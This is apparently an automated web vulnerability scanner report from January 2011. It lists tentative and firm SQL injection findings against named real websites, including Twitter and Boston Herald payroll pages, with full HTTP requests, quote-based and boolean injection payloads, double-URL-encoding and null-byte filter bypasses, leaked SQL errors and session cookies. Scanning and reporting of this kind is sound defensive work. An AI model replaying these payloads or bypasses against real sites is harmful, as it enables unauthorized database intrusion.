The gotopage parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gotopage parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/%2527 HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:31:40 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/%2527%2527 HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:31:40 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: itr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRTRBSD=ABKPGKMAHOCFOJMDCOENFMKF; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:31:40 GMT
Connection: close
Content-Length: 8250
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.30. http://twitter.com/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://twitter.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:14 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225134-78066-61608
ETag: "d607d45a9b9b35bf9e842e32301673c1"
Last-Modified: Fri, 28 Jan 2011 14:32:14 GMT
X-Runtime: 0.00992
Content-Type: text/html; charset=utf-8
Content-Length: 44338
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/114763578/logoStackedBlack_normal.jpg" style="vertical-align:middle" width="48" />
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225135-14261-45141
ETag: "9605f681076d2ce0929285f2a3ef830b"
Last-Modified: Fri, 28 Jan 2011 14:32:15 GMT
X-Runtime: 0.01078
Content-Type: text/html; charset=utf-8
Content-Length: 44355
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...

1.31. http://twitter.com/ [original_referer cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://twitter.com
Path:   /

Issue detail

The original_referer cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the original_referer cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /?status=@ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa'; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response 1

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234419-42681-53710
ETag: "f792bef31a7a2a529a063813c45d5cab"
Last-Modified: Fri, 28 Jan 2011 17:06:59 GMT
X-Runtime: 0.05064
Content-Type: text/html; charset=utf-8
Content-Length: 45230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<div class="hc-tweet-text">says when you give your permission to succeed, you can deny that you gave yourself that permission later when you fail.</div>
...[SNIP]...

Request 2

GET /?status=@ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa''; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response 2

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:07:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234420-50746-44456
ETag: "8e7d3220e37789a7d94eb127863bf8c4"
Last-Modified: Fri, 28 Jan 2011 17:07:00 GMT
X-Runtime: 0.04397
Content-Type: text/html; charset=utf-8
Content-Length: 45014
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...

1.32. http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/cambridge/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/cambridge/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 451
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.*,j.full FROM `cambridgeData` a INNER JOIN `cambridgeCats` j ON j.cat_id = department_id WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.33. http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/mass_pike/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/mass_pike/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 319
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT * FROM `massPikePayroll` WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.34. http://www.bostonherald.com/projects/payroll/quasi_state/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quasi_state/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/quasi_state/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:39:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 492
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.*, b.agency FROM `quasi_state_data` a INNER JOIN `quasi_state_agencies` b ON a.quasi_state_agency_id = b.id WHERE 1=1 ORDER BY ?1\'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1\'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.35. http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quincy/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/quincy/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:36:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 317
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `quincyData` a WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.36. http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/suffolk/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/suffolk/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 319
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `suffolkData` a WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.37. http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/worcester/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/worcester/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:42:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 323
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `worcesterData` a WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.38. http://www.dominionenterprises.com/main/do/Terms_of_Use [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Terms_of_Use

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do'%20and%201%3d1--%20/Terms_of_Use HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 18:06:02 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=be366704e38672859a8db520782f792d; expires=Sun, 30 Jan 2011 18:06:02 GMT; path=/
Pragma: no-cache
